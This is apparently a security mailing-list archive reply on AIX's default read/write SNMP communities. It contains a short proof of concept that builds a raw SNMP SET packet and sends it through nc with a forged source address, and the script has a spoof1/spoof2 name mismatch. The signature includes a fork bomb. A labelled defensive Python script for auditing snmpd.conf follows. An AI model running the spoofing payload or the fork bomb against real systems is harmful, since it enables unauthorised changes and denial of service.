On Tue, 15 Feb 2000, harikiri wrote:

> It appears that on the above releases of AIX, the SNMP daemon is
> enabled by default and two community names are enabled with read/write
> privileges. The community names are "private" and "system", but are
> only allowed from localhost connections. Nevertheless, a local user
> may install an SNMP client, and modify sensitive variables.

SNMP requests with no authentication except for source-IP comparison are
spoofable.

--snip--
#!/bin/bash
cat >/tmp/spoof1.c <<_EOF_
char private[]="0\202\0-\2\1\0\4\7private\243\37\2\1\1\2\1\0\2\1\0000\0240\202"
"\0\20\6\10+\6\1\2\1\1\4\0\4\4null";
main() { write(1,private,sizeof(private)); }
_EOF_
gcc -o /tmp/spoof1 /tmp/spoof1.c
/tmp/spoof2 | nc -s FakeSourceIPHere -u RemoteIPHere 161
--snip--

UDP blind spoofing, nothing easier.

_______________________________________________________
Michal Zalewski * [lcamtufat_private] <=> [AGS WAN SYSADM]
[dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
[+48 22 813 25 86] [+48 603 110 160] bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
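The defensive takeaway of the thread is that a read/write SNMPv1 community whose only protection is a source-address check is a finding on its own, whatever that address is, because a UDP datagram's source address is attacker-chosen. The following audit script is an added example and is not code from the post or from IBM. It assumes the classic AIX /etc/snmpd.conf syntax `community <name> [<address> [<netmask> [<permissions> [<view>]]]]` with defaults of 0.0.0.0 / 0.0.0.0 / readOnly when fields are omitted; the sample configuration it scans is constructed, not taken from a real host.

```python
"""Flag SNMP communities that grant write access on the strength of a
source-address filter alone.

Added example (not from the original post). Assumed AIX snmpd.conf syntax:
    community <name> [<address> [<netmask> [<permissions> [<view>]]]]
"""
import ipaddress

# Constructed sample configuration; the "private"/"system" lines mirror the
# localhost-only read/write setup the thread describes.
SAMPLE_SNMPD_CONF = """\
# constructed example, not a real AIX configuration
community       public
community       private 127.0.0.1 255.255.255.255 readWrite
community       system  127.0.0.1 255.255.255.255 readWrite 1.17.2
community       monitor 10.0.0.5   255.255.255.255 readOnly
"""

# Assumed AIX defaults for omitted fields: any address, any mask, read only.
_DEFAULTS = ["0.0.0.0", "0.0.0.0", "readOnly", None]


def parse_communities(text):
    """Return one dict per 'community' line, comments and blank lines skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if fields[0].lower() != "community" or len(fields) < 2:
            continue
        rest = fields[2:]
        rest = rest + _DEFAULTS[len(rest):]      # pad missing trailing fields
        address, netmask, permission, view = rest[:4]
        entries.append({"name": fields[1], "address": address,
                        "netmask": netmask, "permission": permission,
                        "view": view})
    return entries


def grants_write(permission):
    """AIX permission keywords that allow SNMP SET (assumed: readWrite, writeOnly)."""
    return permission.lower() in ("readwrite", "writeonly")


def describe_scope(address, netmask):
    """Human-readable description of the address/netmask filter."""
    try:
        net = ipaddress.ip_network(f"{address}/{netmask}", strict=False)
    except ValueError:
        return "unparseable address"
    if net.prefixlen == 0:
        return "any source address"
    if net.num_addresses == 1 and net.network_address.is_loopback:
        return "localhost only"
    if net.num_addresses == 1:
        return f"single host {net.network_address}"
    return f"network {net}"


def audit(text):
    """List every write-capable community; each is flagged regardless of
    how narrow the address filter is, since the filter is spoofable."""
    findings = []
    for c in parse_communities(text):
        if not grants_write(c["permission"]):
            continue
        findings.append({
            "community": c["name"],
            "scope": describe_scope(c["address"], c["netmask"]),
            "reason": ("write access gated only by source address, which a "
                       "forged UDP datagram can satisfy"),
        })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SNMPD_CONF):
        print(f"[!] community '{f['community']}' ({f['scope']}): {f['reason']}")
```

Run against a real file by replacing `SAMPLE_SNMPD_CONF` with the contents of /etc/snmpd.conf; any line the script reports should either lose its write permission or be replaced by an authenticated mechanism rather than a tighter netmask.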
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:35:37 PDT